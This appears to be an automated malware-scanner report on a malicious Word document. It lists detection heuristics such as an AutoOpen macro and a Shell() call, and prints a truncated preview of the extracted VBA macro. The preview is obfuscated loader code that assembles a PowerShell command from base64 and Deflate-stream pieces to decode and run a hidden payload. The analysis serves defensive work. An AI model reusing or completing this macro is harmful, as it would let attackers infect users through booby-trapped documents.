MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
The sample contains VBA macros with an AutoOpen function, which is a common technique for executing malicious code upon opening the document. A critical heuristic firing indicates a Shell() call within the VBA, suggesting the execution of external commands. The extracted VBA script attempts to construct and execute a PowerShell command, likely to download and run a secondary payload. The specific PowerShell command construction is obfuscated, but the intent is clear.
Heuristics 5
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 71556 bytes |
SHA-256: 53ed9e974865799cf356d93bc96b6d4e25fdf1a7d842fc4bcde59a2fd149367c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "NLmQmSGElHV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function tBhuH()
On Error Resume Next
NXnsHEQTsh = IcvRwbO + CSng(941024) + 776689 / Sin(545306 - CByte(588203) / 353589 - Round(941024)) + zqwJZzosMcb * wpVVfmk - (776689 + 545306 + 588203 - 9410240)
Set kMLaZhjclI = qWqEvOONt
zhfdL = "bYD7owershell (NEomCgGbg6wlNWhRHPkXndblew-oBJecT iOeIkyKxX1ojfx3Un4DxjTd"
iDsfJwBN = Left(Right(zhfdL, 68), 12) + Left(Right(zhfdL, 33), 12)
ZCYnzDYwab = "bY.stREaMw4TyVW7EomCgrEaderNWhRHPkXndbl"
DjDYONtPAS = Left(Right(ZCYnzDYwab, 37), 7) + Left(Right(ZCYnzDYwab, 18), 6)
qoKjNf = "bY( (New-w4TyVW7EomCgoBJecTNWhRHPkXndbl"
kMUmLX = Left(Right(qoKjNf, 37), 7) + Left(Right(qoKjNf, 18), 6)
wnTbk = "bYD7k iO.comprEsSiOngGbg6wlNWhRHPkXndbljHOAB3l7GVH.DeflATESTreaM( 4DxjTd23vH6PcKoVrFxmyemCp6a"
IEmjLfFhVH = CStr(Left(Right(wnTbk, 88), 15)) + Left(Right(wnTbk, 43), 16)
FTlGsICWV = ShrlKajX + CSng(712213) + 2908 / Sin(699909 - CByte(642161) / 125683 - Round(712213)) + bnfWadQwV * snOKmBmocsr - (2908 + 699909 + 642161 - 7122130)
Set KkSdjBWGN = UHuwazKcc
Vncphf = "bYD7[SyStEM.iO.7EomCgGbg6wlNWhRHPkXndmEmorystREamHkeIkyKxX1ojfx3Un4Dx"
cGowmDfU = Left(Right(Vncphf, 65), 11) + Left(Right(Vncphf, 32), 12)
OUIJDoGNaO = "bYD7k] [cONVeRT]::FroGbg6wlNWhRHPkXndbljHOAB3l7GVHkeImBAsE64stRINg('XVTd23vH6PcKoVrFxmyemCp6axzcR6g"
oTLbjL = CStr(Left(Right(OUIJDoGNaO, 94), 16)) + Left(Right(OUIJDoGNaO, 46), 17)
PmwRwbBqm = "bYD7kbbbiJHEH2PlH8Y7YGbg6wlNWhRHPkXndbljHOAB3l7GVHkeINhltvcmVkrkgl4ZSeTd23vH6PcKoVrFxmyemCp6axzcR6g"
BItVtGJu = CStr(Left(Right(PmwRwbBqm, 94), 16)) + Left(Right(PmwRwbBqm, 46), 17)
CZpDLwlZjCC = "bYDG3XARdiw/yVW7EomCgGbg6wlNWhjIdxYLkaWFHOAB3l7GVHkeIkyKx"
KZiNmt = Left(Right(CZpDLwlZjCC, 54), 9) + CStr(Left(Right(CZpDLwlZjCC, 27), 10))
qLBhW = uobizHYvMuJ + CSng(179040) + 155196 / Sin(692027 - CByte(241113) / 553143 - Round(179040)) + DrofAzRh * GnBzqw - (155196 + 692027 + 241113 - 1790400)
Set CvPknLpXB = aUABbZz
BzHFJBBmPk = Chr(43)
FVjQqa = "Eeb"
tsFIXYOjkzW = Left(Right(FVjQqa, 3), 1)
oGQFzS = Chr(43)
zowioK = "bYD7kPec0901OHkYurq6gGbg6wlNWhRHPkXndbljHOAB3l7GVHurq76tQprDOrXH5J4DxjTd23vH6PcKoVrFxmyemCp6a"
jTEkUcaTv = CStr(Left(Right(zowioK, 88), 15)) + Left(Right(zowioK, 43), 16)
twEUiBcoIlf = FSJMHGJSMpN + CSng(313578) + 972209 / Sin(433559 - CByte(883336) / 512607 - Round(313578)) + rQuOR * pnHTCiTWhzu - (972209 + 433559 + 883336 - 3135780)
Set RGNcL = vajZfAn
OEUbR = Chr(43)
izzjX = "9fD7kUp4lw4T"
WJjXDDYts = CStr(Left(Right(izzjX, 12), 2)) + Left(Right(izzjX, 6), 2)
IpPuTtwjzP = Chr(43)
NkuPopFjM = "bYLSKn3uTw4TyVW7EomCgrafS3ZNWhRHPkXndbl"
BQmPlvkiho = Left(Right(NkuPopFjM, 37), 7) + Left(Right(NkuPopFjM, 18), 6)
McvkzMqkE = "bYD7kU9lXYv7/2q61a9h9ofg6wlNWhRHPkXndbljHOAB3l7GVHkeIkyK61mvVLLLsCx/OrjJ8evH6PcKoVrFxmyemCp6axzcR6gGhtImn"
NJOZhSSsr = CStr(Left(Right(McvkzMqkE, 99), 17)) + CStr(Left(Right(McvkzMqkE, 49), 18))
VWnuTCEDPr = "bYD7kA2jwePX3g8BMdD6OGbg6wlNWhRHPkXndbljHOAB3l7GVHkeCD6MeYYtnD53MeYQxjTd23vH6PcKoVrFxmyemCp6axzc"
KNsaE = Left(Right(VWnuTCEDPr, 91), 16) + Left(Right(VWnuTCEDPr, 44), 16)
SjwKDXrIlr = "bY4dLH18Ac4TyVW7EomCgGbgxcqCIfcHPkXndbljHOAB3"
nUHobBp = Left(Right(SjwKDXrIlr, 43), 8) + CStr(Left(Right(SjwKDXrIlr, 21), 7))
rqCuojiz = aAHMTt + CSng(151576) + 351934 / Sin(148908 - CByte(756253) / 206471 - Round(151576)) + nKAkEpzKS * zltHcZVczir - (351934 + 148908 + 756253 - 1515760)
Set TlcqwkCSOmm = ZUNWUB
AFiWZQau = Chr(43)
OJtwnpmAwWP = "bY94oDUGzw4TyVW7EomCgvC5/DDNWhRHPkXndbl"
iKLraCUv = Left(Right(OJtwnpmAwWP, 37), 7) + Left(Right(OJtwnpmAwWP, 18), 6)
uVDbJbsM = "FPD7kg2Tl"
lNrhBfKFaE = Left(Right(uVDbJbsM, 9), 2) + CStr(Left(Right(uVDbJbsM, 4), 1))
QSUoi = Chr(43)
EDBmNNcF = "bYD7kUGPv26UMHKhz/sC6mCg6wlNWhRHPkXndbljHOAB3l7GVHkeIkyKnwgjLDxugEWAJe6DocvH6PcKoVrFxmyemCp6axzcR6gGhtImn"
WpwCuaHwFGN = CStr(Left(Right(E
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.